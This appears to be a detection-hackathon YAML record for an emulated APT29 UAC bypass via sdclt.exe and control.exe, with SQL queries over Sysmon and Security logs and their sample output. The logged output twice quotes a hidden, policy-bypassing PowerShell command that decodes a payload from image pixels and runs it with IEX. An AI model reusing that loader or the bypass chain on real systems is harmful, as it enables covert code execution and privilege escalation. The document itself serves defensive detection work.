vendor: OTR Community
step: 3.B.2
procedure: Executed elevated PowerShell payload
criteria: High integrity powershell.exe spawning from control.exe​​ (spawned from sdclt.exe)
technique:
  name: Bypass User Account Control
  id: T1088
issue: https://github.com/OTRF/detection-hackathon-apt29/issues/6
detections:
  - main_type: Technique
    modifier_type:
    description: A Technique detection can be created for sdclt spawning child processes which would catch sdclt.exe spawning control.exe. This could be an indicator of sdclt being used for Bypass UAC techniques.
    reference:
    queries:
      - id: 7a4a8c7e-4238-4db3-a90d-34e9f3c6e60f
        data_sources:
          - event_provider: Microsoft-Windows-Sysmon/Operational
            event_logs:
              - 1
        rule_contribution:
        logic: |
          SELECT Message
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(ParentImage) LIKE "%sdclt.exe%"
        output: |
          Process Create:
          RuleName: -
          UtcTime: 2020-05-02 02:58:43.212
          ProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400}
          ProcessId: 4892
          Image: C:\Windows\System32\control.exe
          FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
          Description: Windows Control Panel
          Product: Microsoft® Windows® Operating System
          Company: Microsoft Corporation
          OriginalFileName: CONTROL.EXE
          CommandLine: "C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter
          CurrentDirectory: C:\windows\system32\
          User: DMEVALS\pbeesly
          LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
          LogonId: 0x372E81
          TerminalSessionId: 2
          IntegrityLevel: High
          Hashes: SHA1=D054A1D1E0BECCA5EEF751CF616ECB811CFABECE,MD5=62D970D8B60F75C12D21C740F2D8A5DA,SHA256=D6E21DA3BE0701162A36F8C9F94E616B1A0C5FD4CC1B52EFD81959CB257957C1,IMPHASH=7A8EC2645C24D85DE8216D63022623C0
          ParentProcessGuid: {47ab858c-e1e3-5eac-b503-000000000400}
          ParentProcessId: 6492
          ParentImage: C:\Windows\System32\sdclt.exe
          ParentCommandLine: "C:\windows\system32\sdclt.exe"
      - id: d52fe669-55da-49e1-a76b-89297c66fa02
        data_sources:
          - event_provider: Security
            event_logs:
              - 4688
        rule_constribution:
        logic: |
          SELECT Message
          FROM apt29Host
          WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
        output: |
          A new process has been created.

          Creator Subject:
            Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
            Account Name:		pbeesly
            Account Domain:		DMEVALS
            Logon ID:		0x372E81
          
          Target Subject:
            Security ID:		S-1-0-0
            Account Name:		-
            Account Domain:		-
            Logon ID:		0x0
          
          Process Information:
            New Process ID:		0x131c
            New Process Name:	C:\Windows\System32\control.exe
            Token Elevation Type:	%%1937
            Mandatory Label:		S-1-16-12288
            Creator Process ID:	0x195c
            Creator Process Name:	C:\Windows\System32\sdclt.exe
            Process Command Line:	"C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter
  - main_type: Telemetry
    modifier_type:
    description: Telemetry showed sdclt.exe being spawned as a high integrity process and control.exe creating a high integrity powershell.exe.
    reference:
    queries:
      - id: F7E315BA-6A66-44D8-ABB3-3FBB4AA8F80A
        data_sources:
          - event_provider: Microsoft-Windows-Sysmon/Operational
            event_logs:
              - 1
        rule_contribution:
        logic: |
          SELECT Message
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%sdclt.exe"
              AND IntegrityLevel = "High"
        output: |
          Process Create:
          RuleName: -
          UtcTime: 2020-05-02 02:58:43.008
          ProcessGuid: {47ab858c-e1e3-5eac-b503-000000000400}
          ProcessId: 6492
          Image: C:\Windows\System32\sdclt.exe
          FileVersion: 10.0.18362.657 (WinBuild.160101.0800)
          Description: Microsoft® Windows Backup
          Product: Microsoft® Windows® Operating System
          Company: Microsoft Corporation
          OriginalFileName: sdclt.exe
          CommandLine: "C:\windows\system32\sdclt.exe" 
          CurrentDirectory: C:\windows\system32\
          User: DMEVALS\pbeesly
          LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
          LogonId: 0x372E81
          TerminalSessionId: 2
          IntegrityLevel: High
          Hashes: SHA1=4D64682188DB0A028EC382975D8872CF1B61EBE4,MD5=F96744B10792C70426608E670C0E39DB,SHA256=DAFB903D3AA945C4AC01011E38F3E232D6BE8B7F9B66B7C3CCB1A1ECFC1B7A90,IMPHASH=B3A705D69AAAAF7164324CD5E6AF8E0D
          ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
          ParentProcessId: 3480
          ParentImage: C:\Windows\System32\cmd.exe
          ParentCommandLine: "C:\windows\system32\cmd.exe"
      - id: 6C8780E9-E6AF-4210-8EA0-72E9017CEE7D
        data_sources:
          - event_provider: Microsoft-Windows-Sysmon/Operational
            event_logs:
              - 1
        rule_contribution:
        logic: |
          SELECT Message
          FROM apt29Host a
          INNER JOIN (
              SELECT ProcessGuid
              FROM apt29Host
              WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
                  AND EventID = 1
                  AND LOWER(Image) LIKE "%control.exe"
                  AND LOWER(ParentImage) LIKE "%sdclt.exe"
          ) b
          ON a.ParentProcessGuid = b.ProcessGuid
          WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
              AND a.EventID = 1
              AND a.IntegrityLevel = "High"
        output: |
          Process Create:
          RuleName: -
          UtcTime: 2020-05-02 02:58:44.325
          ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
          ProcessId: 2976
          Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
          Description: Windows PowerShell
          Product: Microsoft® Windows® Operating System
          Company: Microsoft Corporation
          OriginalFileName: PowerShell.EXE
          CommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"
          CurrentDirectory: C:\windows\system32\
          User: DMEVALS\pbeesly
          LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
          LogonId: 0x372E81
          TerminalSessionId: 2
          IntegrityLevel: High
          Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
          ParentProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400}
          ParentProcessId: 4892
          ParentImage: C:\Windows\System32\control.exe
          ParentCommandLine: "C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter
      - id: C36B49B5-DF58-4A34-9FE9-56189B9DEFEA
        data_sources:
          - event_provider: Security
            event_logs:
              - 4688
        rule_contribution:
        logic: |
          SELECT Message
          FROM apt29Host
          WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%sdclt.exe"
            AND MandatoryLabel = "S-1-16-12288"
            AND TokenElevationType = "%%1937"
        output: |
          A new process has been created.

          Creator Subject:
            Security ID:		S-1-5-18
            Account Name:		SCRANTON$
            Account Domain:		DMEVALS
            Logon ID:		0x3E7
          
          Target Subject:
            Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
            Account Name:		pbeesly
            Account Domain:		DMEVALS
            Logon ID:		0x372E81
          
          Process Information:
            New Process ID:		0x195c
            New Process Name:	C:\Windows\System32\sdclt.exe
            Token Elevation Type:	%%1937
            Mandatory Label:		S-1-16-12288
            Creator Process ID:	0xd98
            Creator Process Name:	C:\Windows\System32\cmd.exe
            Process Command Line:	"C:\windows\system32\sdclt.exe"
      - id: EE34D18C-0549-4AFB-8B98-01160B0C9094
        data_sources:
          - event_provider: Security
            event_logs:
              - 4688
        rule_contribution:
        logic: |
          SELECT Message
          FROM apt29Host a
          INNER JOIN (
              SELECT NewProcessId
              FROM apt29Host
              WHERE LOWER(Channel) = "security"
                  AND EventID = 4688
                  AND LOWER(NewProcessName) LIKE "%control.exe"
                  AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
          ) b
          ON a.ProcessId = b.NewProcessId
          WHERE LOWER(a.Channel) = "security"
              AND a.EventID = 4688
              AND a.MandatoryLabel = "S-1-16-12288"
              AND a.TokenElevationType = "%%1937"
        output: |
          A new process has been created.

          Creator Subject:
            Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
            Account Name:		pbeesly
            Account Domain:		DMEVALS
            Logon ID:		0x372E81
          
          Target Subject:
            Security ID:		S-1-0-0
            Account Name:		-
            Account Domain:		-
            Logon ID:		0x0
          
          Process Information:
            New Process ID:		0xba0
            New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Token Elevation Type:	%%1937
            Mandatory Label:		S-1-16-12288
            Creator Process ID:	0x131c
            Creator Process Name:	C:\Windows\System32\control.exe
            Process Command Line:	"PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"
